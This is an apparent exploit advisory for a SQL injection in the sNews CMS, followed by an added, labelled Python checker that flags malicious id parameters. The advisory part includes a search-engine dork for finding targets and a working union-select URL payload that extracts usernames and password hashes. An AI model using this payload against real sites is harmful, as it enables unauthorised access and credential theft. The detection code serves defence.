Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
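
A defender-side check for the request shape shown above, as an added example that is not part of the original advisory or of sNews itself: it flags snews.php requests whose id parameter is not a plain integer, which covers the comment-padded union select in the example. The function names and the sample request lines are constructed for illustration, and it assumes id is meant to be a numeric article ID.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate `id` for act=shownews is a plain non-negative integer.
VALID_ID = re.compile(r"\d{1,10}")
# SQL keywords joined by whitespace or inline comments (/**/), as in the example.
SQLI_HINT = re.compile(r"union(?:\s|/\*.*?\*/)+select|concat\s*\(|/\*", re.I)


def check_request(target):
    """Return (verdict, reason) for one request target (path + query string)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/snews.php"):
        return ("ignore", "not snews.php")
    # parse_qs percent-decodes values, so %20 in the query is seen as a space.
    ids = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    if not ids:
        return ("ok", "no id parameter")
    for value in ids:  # check every occurrence, not only the first
        if VALID_ID.fullmatch(value):
            continue
        if SQLI_HINT.search(value):
            return ("alert", "SQL syntax in id")
        return ("alert", "non-numeric id")
    return ("ok", "numeric id")


def scan(targets):
    """Return (target, reason) for the requests that should be reviewed."""
    results = ((t, check_request(t)) for t in targets)
    return [(t, reason) for t, (verdict, reason) in results if verdict == "alert"]


# Constructed sample request lines; the second is the example URL from the advisory.
SAMPLE = [
    "/snews/snews.php?act=shownews&id=23",
    "/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,"
    "concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user"
    "/**/where/**/id%20like%201/*",
    "/snews/snews.php?act=shownews&id=abc",
    "/index.php?id=1",
]

if __name__ == "__main__":
    for target, reason in scan(SAMPLE):
        print(reason, "->", target[:60])
```

The same integer-only rule belongs in the application as well: cast id to an integer and bind it as a query parameter before it reaches the database.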

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*